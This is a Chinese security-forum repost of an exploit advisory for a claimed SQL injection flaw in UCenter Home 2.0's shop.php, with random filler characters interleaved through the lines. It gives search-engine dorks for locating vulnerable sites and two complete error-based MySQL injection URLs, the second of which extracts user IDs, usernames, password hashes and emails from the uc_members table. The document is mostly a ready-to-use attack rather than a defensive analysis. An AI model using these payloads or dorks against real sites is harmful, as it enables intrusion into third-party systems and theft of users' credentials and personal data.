找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( `  i4 Q$ L: g( C0 W3 H__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  + c8 G0 i# ?* Q; v

" H6 Q4 B7 }4 ?* I                                 
8 H. [% ?8 q. c5 L* w9 o
+ v! j" R' L- |6 }3 Q*/ Author : KnocKout  ) T0 [$ A. ]8 X
2 B, O0 \6 x9 n( c
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
9 Y6 X8 z( f7 [; \8 Q) ~
; ?  I1 a. p7 D2 f% S! N/ w( H, x) |, c2 v*/ Contact: knockoutr@msn.com  
& c2 a' ]6 h) i  W/ E$ [+ c4 U& G3 s( q& B
*/ Cyber-Warrior.org/CWKnocKout  
) G& B; `6 Q/ @+ t5 \( w
" j5 y/ ~. P7 \5 R# A" {1 s1 ^: S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
/ C7 H( R& V9 f( I5 _" U9 R$ l9 ~7 p' Z
Script : UCenter Home  * U; l; p3 ^: ?7 {
4 F3 S3 U4 u  W9 I" N5 P4 u
Version : 2.0  ; f7 u/ u, M' G' s0 g' |5 i
! l0 @1 T5 X2 D
Script HomePage : http://u.discuz.net/  
2 E% {) p2 Z6 n: J! \# q' k1 O$ i3 q% P; A/ z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ! j3 B! A2 ]9 i0 q) R

* ~0 ^9 q1 t" ~0 t* tDork : Powered by UCenter inurl:shop.php?ac=view  5 `% B9 s/ N! V! z: e! _5 p( M

6 J2 A& F, s# e$ N% UDork 2 : inurl:shop.php?ac=view&shopid=  
; o" ?  Y! z$ ]. e- n9 A5 U& Q0 I; G. s4 D' j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ' K  |2 \9 m" _# Q6 E6 E
  W0 l) l& G' s2 R, @% {, d
Vuln file : Shop.php  
+ c; H7 Z/ u) t3 C! g( X( Q: Y; n8 h& {' [& k0 U7 @
value's : (?)ac=view&shopid=  
8 m/ ?. p) A8 W9 d% u* \1 q) d( P+ {2 ?+ F! _2 |6 E
Vulnerable Style : SQL Injection (MySQL Error Based)    y( X% x: F- r/ Q' s3 p" V
9 k6 K# f) {" A
Need Metarials : Hex Conversion  
- Q5 h5 H% g% l
: ~& n5 [! X  ]; w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
, d, v5 [9 K) y( C) V9 }+ z0 q9 t+ H
Your Need victim Database name.   
! n4 K* x. d: j" l% V% p
$ O7 k1 u( Z( f3 L6 _for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
6 w6 z2 L; z4 e5 V% y8 E5 d; p4 A4 o/ B9 P
..  * V& e0 a( M1 k2 F3 v! ~) _7 k1 f# r5 q

' g- O$ K- ?3 U% u0 J1 B  S0 {DB : Okey.  
5 \" Z, q" M( p9 z. Q. z
  q& r# C4 C4 H5 K  `your edit DB `[TARGET DB NAME]`  2 {% K+ B/ M8 j8 r9 @% _
  A* v7 i6 \# X3 x& T: O
Example : 'hiwir1_ucenter'  
( J5 U9 ~- v: X- J# Q
8 c. `. X# b6 h4 X8 ~' Q3 KEdit : Okey.  
! ?! u9 u0 n# [  u  i: h6 `& h
9 W, J4 M2 M1 M3 BYour use Hex conversion. And edit Your SQL Injection Exploit..  
' b& G; i7 H! f' U
8 b( j) K/ H* G& I; }, \   
8 H8 {, A9 `. n+ ~/ v! s0 r2 [2 U4 O8 G- ]4 O$ c2 S* l8 }5 @; X
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
* n3 a1 X' i4 L, Q# l  Y8 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表